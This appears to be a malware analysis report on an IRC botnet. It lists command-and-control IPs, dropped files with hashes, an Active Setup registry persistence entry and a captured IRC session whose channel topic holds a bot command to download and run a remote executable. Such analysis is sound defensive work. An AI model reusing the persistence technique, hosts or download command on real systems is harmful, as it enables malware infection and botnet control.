64.120.11.167 (ogard’s 23k botnet)

Remote Host        Port Number
193.242.108.49     80
66.45.237.212      80
64.120.11.167      5900

File System Modifications

* The following files were created in the system:

#  Filename(s)                               File Size      File Hash
1  %UserProfile%\update.exe                  57 387 bytes   MD5: 0xD037B4F37AF523C6F7CFB0BA122296A2
                                                            SHA-1: 0x23CD0E21CF3C0693E2F4ECA7A2DB3B04E43D351E
2  c:\Gardi\Tuxat\bov.exe                    69 632 bytes   MD5: 0x99CA8EFB12FB35FA09D10C595EB37DC8
   [file and pathname of the sample #1]                     SHA-1: 0xA97BE1EBB176D74C6191D17774E1888330CE86FD
3  c:\Gardi\Tuxat\DesKTop.ini                62 bytes       MD5: 0x7457A5DF1FF47C957ACF1FA000D7D9AD
                                                            SHA-1: 0x69D2BBA827FD4DE0169419A0FDA280252B348514

* Note:
o %UserProfile% is a variable that specifies the current user’s profile folder. By default, this is C:\Documents and Settings\[UserName] (Windows NT/2000/XP).

* The following directories were created:
o c:\Gardi
o c:\Gardi\Tuxat

Registry Modifications

* The following Registry Key was created:
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{67KLN5J0-4OPM-61WE-KKX2-4887QWE23218}

* The newly created Registry Value is:
o [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{67KLN5J0-4OPM-61WE-KKX2-4887QWE23218}]
+ StubPath = “c:\Gardi\Tuxat\bov.exe”

This Active Setup StubPath entry causes bov.exe to run every time Windows starts.

* The data identified by the following URLs was then requested from the remote web server:
o http://193.242.108.49/Dialer_Min/number.asp
o http://yeahbr0.t35.com/resources/bottom.mos

NICK VirUs-dqgtyntw
USER VirUs “” “tjb” :
8Coded
8VirUs..
JOIN #7# Virus
PRIVMSG #7# :Success.

PASS Virus

Invisible Users: 16805
Channels: 9 channels formed
Clients: I have 16806 clients and 0 servers
Local users: Current Local Users: 16806 Max: 23080
Global users: Current Global Users: 16806 Max: 23080

Now talking in #7#
Topic On: [#7# ] [ !NAZELlol http://yeahbr0.t35.com/resources/bottom.mos update.exe 1 ]
Topic By: [ OgarDtheLegenD ]
Modes On: [ #7# ] [ +smntMu ]
